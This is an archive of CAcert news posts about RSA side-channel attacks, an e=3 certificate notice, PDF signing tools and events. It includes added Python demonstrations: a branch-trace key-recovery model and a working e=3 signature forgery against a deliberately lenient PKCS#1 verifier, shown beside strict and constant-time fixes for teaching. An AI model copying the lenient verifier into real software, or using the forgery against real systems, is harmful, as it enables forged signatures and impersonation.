Author Archives: Sourcerer

A New Vulnerability In RSA Cryptography

A new vulnerability in RSA cryptography has been found. It works by spying on CPU internals (the branch predictor) from a program running on the same computer as the crypto application. Dedicated, single-purpose systems (like CAcert's certificate generation machines) are not affected; only multi-tasking and multi-user systems, where an attacker can run code alongside the crypto application, are affected.

A New Vulnerability In RSA Cryptography

   Posted by kdawson on Saturday November 18, @04:45PM
   from the predictions-of-trouble dept.

   romiz writes, "Branch Prediction Analysis is a recent attack vector
   against RSA public-key cryptography on personal computers that relies
   on timing measurements to get information on the bits in the private
   key. However, the method is not very practical because it requires
   many attempts to obtain meaningful information, and the current
   OpenSSL implementation now includes protections against those attacks.
   However, German cryptographer Jean-Pierre Seifert has announced [1] a
   new method called Simple Branch Prediction Analysis that is at the
   same time much more efficient than the previous ones, only needs a
   single attempt, successfully bypasses the OpenSSL protections, and
   should prove harder to avoid without a very large execution penalty."
   From the article: "The successful extraction of almost all secret key
   bits by our SBPA attack against an openSSL RSA implementation proves
   that the often recommended blinding or so called randomization
   techniques to protect RSA against side-channel attacks are, in the
   context of SBPA attacks, totally useless." [2] Le Monde interviewed
   Seifert (in French, but Babelfish works well) and claims that the
   details of the SBPA attack are being withheld; however, a PDF of the
   paper is linked from the [3] ePrint abstract.
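The quoted paper says blinding is useless against SBPA. The reason is that message blinding randomises the base of the exponentiation, not the exponent, and the branch the spy observes depends only on the exponent bits. The following added example (not CAcert's, OpenSSL's or Seifert's code) models that with a toy modulus and a constructed private exponent: a square-and-multiply loop whose multiply step sits behind a branch on the current key bit, a "trace" list standing in for what the spy infers from the branch predictor, and, for contrast, a Montgomery ladder with a mask-based conditional swap that performs the same operations in every iteration. The recorded trace is a simplification of a real SBPA measurement; the exponent, modulus and the fixed exponent width are constructed values.

```python
# Added example, not code from the original page. Models the key-dependent
# branch that SBPA observes and why base blinding does not remove it.
import secrets

D = 0x1A4F1B3D9C5E7F1          # constructed "private exponent" (toy size)
N = (1 << 61) - 1              # constructed modulus (a Mersenne prime)
WIDTH = 64                     # fixed exponent width used by the ladder


def modexp_branchy(base, exp, mod, trace):
    """Left-to-right square-and-multiply. The multiply runs only when the
    current exponent bit is 1, so the taken/not-taken pattern of that
    branch is the exponent in binary. `trace` records that pattern."""
    result = 1
    for i in range(exp.bit_length() - 1, -1, -1):
        result = result * result % mod
        if (exp >> i) & 1:          # key-dependent branch: this is the leak
            trace.append(1)
            result = result * base % mod
        else:
            trace.append(0)
    return result


def recover_exponent(trace):
    """Turn an observed branch pattern back into the exponent."""
    exp = 0
    for bit in trace:
        exp = (exp << 1) | bit
    return exp


def modexp_ladder(base, exp, mod, trace, width=WIDTH):
    """Montgomery ladder with a mask-based conditional swap. Every
    iteration does one multiply and one square regardless of the bit,
    so the operation sequence does not depend on the exponent.
    (In CPython the interpreter still branches internally; the point is
    the algorithm, which a C implementation can compile branch-free.)"""
    r0, r1 = 1, base % mod
    for i in range(width - 1, -1, -1):
        mask = -((exp >> i) & 1)    # 0 or -1 (all ones): no branch on the bit
        t = (r0 ^ r1) & mask        # swap r0/r1 iff the bit is 1
        r0, r1 = r0 ^ t, r1 ^ t
        r1 = r0 * r1 % mod          # invariant: r1 == r0 * base
        r0 = r0 * r0 % mod
        t = (r0 ^ r1) & mask        # swap back iff the bit is 1
        r0, r1 = r0 ^ t, r1 ^ t
        trace.append("mul,sqr")     # identical entry in every iteration
    return r0


def sbpa_demo(message):
    """Run the branchy exponentiation with and without message blinding,
    recover the exponent from both traces, and show the ladder's trace
    carries no information. Returns a dict with the findings."""
    r = secrets.randbelow(N - 2) + 2            # blinding factor
    plain_trace, blind_trace, ladder_trace = [], [], []
    modexp_branchy(message, D, N, plain_trace)
    modexp_branchy(message * r % N, D, N, blind_trace)   # blinded base
    modexp_ladder(message, D, N, ladder_trace)
    return {
        "plain": recover_exponent(plain_trace),
        "blinded": recover_exponent(blind_trace),
        "same_trace": plain_trace == blind_trace,
        "ladder_uniform": len(set(ladder_trace)) == 1,
    }


if __name__ == "__main__":
    print(sbpa_demo(0x1234567))
```

Both runs of the branchy loop produce the same trace and both recover D, whatever the blinding factor. Exponent blinding (replacing d by d + k*phi(n)) does not help against a single-trace attack either, because the recovered blinded exponent is itself a valid private exponent. The ladder's trace is the same entry repeated; real implementations have to achieve this in the native big-number code, not in Python.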


Signing PDF documents

We would like to announce the availability of free PDF signature applications:
PortableSigner is a nice application with a GUI.
CAcert PDF Signer is an older, command-line only application.
Both applications run on Java and use the iText library, so they should work on Linux, Mac OS X and Windows.

New Jobs at CAcert

Due to growing demand, CAcert is currently expanding its organisation structure to better handle the work. We decided to enable people to become product managers for the various products we have, and to create a couple of positions for officers dedicated to specific topics and tasks.

The available positions for Product Managers are:
Timestamping, OpenPGP signatures, X.509 certificates, Jabber certificates, Assurance System, Organisation Assurance, Revocation (OCSP+CRL), Digital Signatures, Electronic Invoices, SmartCards

The available areas for Officers:
Security Officer, System Administration, Software Officer, Standardisation Officer, Human Resources, Quality Officer, Public Relations Officer

If you are interested in helping CAcert in any of the mentioned fields, please read the details and contact us.

Thanks for all your help!

Security notice: e=3 certificates

1. A recent cryptography paper has announced a threat to
RSA certificates whose public key uses the small public
exponent 3 (known as e=3).


2. CAcert formed a task force to deal with this issue,
and searched all certs that we issued. We discovered:

a. 414 user certs have this characteristic of e=3.
b. No root or intermediate certs have e=3.

3. We will write to all users with these certs and advise
them to revoke and re-issue.

4. At this stage, we believe the threat of attack to be
low. For this reason we have decided to not revoke the
certificates preemptively.

5. However, if:

a. you are using the certificate for high value purposes,
b. you are in an environment where you may expect to be
attacked aggressively,
c. your software or the software of your users is not
kept up to date or patched,
d. there is a potential attack involving tricking a user
with a bogus RSA signature,

then you may be more at risk. If you think so, we suggest
you revoke the current certificate if e=3, and re-issue
using the normal CAcert website processes.

6. The CAcert risk team is watching the situation and may
choose at some stage to revoke those certificates preemptively.

7. We expect other CAs to take similar steps. This is an
industry wide security situation, and many companies are
evaluating the fallout from the announced weakness.

8. The software packages known to be affected today are:
OpenSSL < 0.9.8c, Firefox <, Opera < 9.02, Netscape.
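The notice does not name the paper, but the affected versions it lists are the ones that fixed the 2006 e=3 signature forgery: a PKCS#1 v1.5 verifier that parses the padded block from the left and stops after the DigestInfo lets an attacker append arbitrary bytes after the hash, and when e=3 a value whose cube has the right leading bytes can be found with an integer cube root, without the private key. The following added example (not CAcert's code and not from the paper) shows the vulnerable verifier beside a strict one and carries out the forgery. The 3072-bit modulus, the SHA-1 digest and the message are constructed values; the modulus is only an odd number of the right size, not a real RSA key, because the forgery never needs its factors.

```python
# Added example, not code from the original page. Demonstrates the e=3
# forgery against a lenient PKCS#1 v1.5 signature check.
import hashlib
import hmac

# DER prefix of DigestInfo for SHA-1 (RFC 3447, section 9.2, note 1)
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")
E = 3
N = (1 << 3071) | 0x10001          # constructed 3072-bit odd modulus (not a key)
K = (N.bit_length() + 7) // 8      # 384 bytes


def emsa_pkcs1_v15(digest, k):
    """Correct EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 || DigestInfo||hash.
    The FF run must fill the block exactly; there is no slack."""
    t = SHA1_DIGESTINFO + digest
    pad_len = k - len(t) - 3
    if pad_len < 8:
        raise ValueError("modulus too small for this digest")
    return b"\x00\x01" + b"\xff" * pad_len + b"\x00" + t


def verify_strict(sig, digest, e=E, n=N):
    """Re-encode and compare the whole block: the only safe way."""
    em = pow(sig, e, n).to_bytes(K, "big")
    return hmac.compare_digest(em, emsa_pkcs1_v15(digest, K))


def verify_lenient(sig, digest, e=E, n=N):
    """The vulnerable pattern: walk the block from the left, accept any
    number of FF bytes, then read the DigestInfo and hash and stop.
    Whatever follows the hash is never examined."""
    em = pow(sig, e, n).to_bytes(K, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i >= K or em[i] != 0x00:
        return False
    i += 1
    t = SHA1_DIGESTINFO + digest
    return em[i:i + len(t)] == t       # BUG: em[i + len(t):] is ignored


def icbrt(x):
    """Floor of the integer cube root, Newton iteration on big ints."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + 2) // 3)   # >= the root, so iteration descends
    while True:
        y = (2 * r + x // (r * r)) // 3
        if y >= r:
            return r
        r = y


def forge_signature(digest, k=K):
    """Target block: 00 01 FF 00 || DigestInfo || hash || zeros. Return the
    smallest s with s**3 >= target. The cube exceeds the target by less
    than 3*s**2, which fits in the zero region, so the leading bytes of
    s**3 still match and s**3 < n. Only works for tiny e such as 3;
    for e=65537 there is no such slack."""
    prefix = b"\x00\x01\xff\x00" + SHA1_DIGESTINFO + digest
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = icbrt(target)
    if s ** 3 < target:
        s += 1
    if (s ** 3).to_bytes(k, "big")[:len(prefix)] != prefix:
        raise ValueError("not enough slack after the hash for a cube root")
    return s


def demo():
    digest = hashlib.sha1(b"constructed message the attacker wants signed").digest()
    s = forge_signature(digest)        # no private key used anywhere
    return {"lenient_accepts": verify_lenient(s, digest),
            "strict_accepts": verify_strict(s, digest)}


if __name__ == "__main__":
    print(demo())
```

The lenient verifier accepts the forged value and the strict one rejects it. Revoking an e=3 certificate removes the forgery target, but the defect is in the verifier: a strict check as above is what the patched OpenSSL and browser versions implement. To see which exponent a certificate uses, run `openssl x509 -in cert.pem -noout -text` and look at the Exponent field in the public key section.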

CAcert in Frankfurt am Main

On 01.11.2006 our LUG holds a keysigning party, where among others CAcert assurers will be present.

It takes place from 19:00 at the Schönhof, in Restaurant Dionysos, Rödelheimer Str. 34 B, Tel. 069-70 36 89.

CAcert at SYSTEMS 2006 in Munich

CAcert is represented at SYSTEMS at booth A3.542.

CAcert at PhreakNIC 10

There is a conference in Nashville, TN, USA on October 20 and 21. At least one assurer will be there. There is a fee for the conference, but not for the vendors area, where an assurer should be available. Ask at the NLUG booth if you need more information. Bring your appropriate IDs and be pre-registered with CAcert.

PhreakNIC 10

Days Inn At the Stadium/Downtown
211 N. First St.
Nashville, Tennessee 37213
United States
Toll Free 1-800-251-3038

CAcert and RegisteredCommons at the Wizards of OS 4 in Berlin

RegisteredCommons is a new web service aimed at providing a secure and trusted registry of audio, video, picture and text works. It will be launched at the 4th Wizards of OS conference in Berlin together with Lawrence Lessig, co-founder of Creative Commons. RegisteredCommons will use CAcert certificates for authenticating authors.
CAcert Assurance will be offered at the Wizards of OS conference in Berlin.

OWASP Autumn Of Code 2006

The Open Web Application Security Project (OWASP) is starting an Autumn of Code campaign to make the web more secure.

SHA1 getting insecure : WinXP-SP2, Debian Stable, FreeBSD 6.1, OSX 10.4 affected!

SHA-1 has just been weakened a bit further.
CAcert is aggressively moving to SHA-2 as we speak.

Microsoft will support SHA-2 only in Windows Vista according to our sources.
Debian Stable, FreeBSD and OS X don't provide SHA-2 in their current versions.
SuSE, Knoppix, FC5, Ubuntu, Mandriva, ... all support SHA-2 already.
Details on SHA-2 support in various applications and distributions are tracked separately.

Please contact your vendor to tell them that you need SHA-2 support!